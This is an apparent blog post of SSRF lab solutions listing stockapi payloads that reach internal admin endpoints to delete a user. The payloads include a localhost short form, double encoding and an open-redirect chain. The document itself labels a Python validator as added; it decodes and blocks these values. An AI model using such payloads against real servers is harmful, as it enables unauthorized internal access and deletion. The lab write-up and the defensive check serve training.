
SSRF - Server Side Request Forgery

Lab 1:

Basic SSRF - Delete user Carlos

stockapi = http://localhost/admin/delete?username=carlos

Lab 2:

stockapi = http://192.168.0.4/admin/delete?username=carlos

Lab 3:

stockapi = http://127.1/%25%36%31dmin

Lab 4:

Lab 5:

stockapi = /product/nextProduct%3fcurrentProductId%3d1%26path%3dhttp%3a//192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos
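
Added example, not part of the original post: a server-side check that canonicalizes a stockapi value before any request is made, run over the values listed in the labs above. The function names and verdict strings are hypothetical, and it goes slightly beyond the post by also handling IPv6 literals and DNS names.

```python
import ipaddress
import socket
from urllib.parse import parse_qsl, unquote, urlsplit

# The stockapi values from the labs above (the post lists none for Lab 4).
SAMPLES = [
    "http://localhost/admin/delete?username=carlos",
    "http://192.168.0.4/admin/delete?username=carlos",
    "http://127.1/%25%36%31dmin",
    "/product/nextProduct%3fcurrentProductId%3d1%26path%3dhttp%3a//"
    "192.168.0.12%3a8080/admin/delete%3fusername%3dcarlos",
]

def fully_decode(s, max_rounds=5):
    """Percent-decode until stable, so %25%36%31 -> %61 -> a is seen as 'a'."""
    for _ in range(max_rounds):
        if (decoded := unquote(s)) == s:
            break
        s = decoded
    return s

def canonical_ip(host):
    """Return the address a literal host denotes, or None for a DNS name."""
    host = "127.0.0.1" if host == "localhost" else host
    for parse in (str, socket.inet_aton):  # full literal, then short forms (127.1)
        try:
            return ipaddress.ip_address(parse(host))
        except (ValueError, OSError):
            pass
    return None

def classify(value):
    """Hypothetical helper: (verdict, canonical target). For a relative path,
    an absolute URL carried in a query parameter is classified in its place."""
    parts = urlsplit(fully_decode(value))
    if not parts.hostname:
        for _, v in parse_qsl(parts.query):
            if v.startswith(("http://", "https://")):
                verdict, target = classify(v)
                return verdict, "nested: " + target
        return "allow", parts.path
    ip = canonical_ip(parts.hostname)
    if ip is None:
        return "resolve", parts.hostname  # resolve, then test every address returned
    internal = ip.is_loopback or ip.is_private or ip.is_link_local
    return ("block" if internal else "allow"), f"{ip}{parts.path}"

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), "<-", sample)
```

A "resolve" verdict means the host is a DNS name: the caller has to resolve it, apply the same address test to every result, and connect only to an address it checked.
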
This post is licensed under CC BY 4.0 by the author.
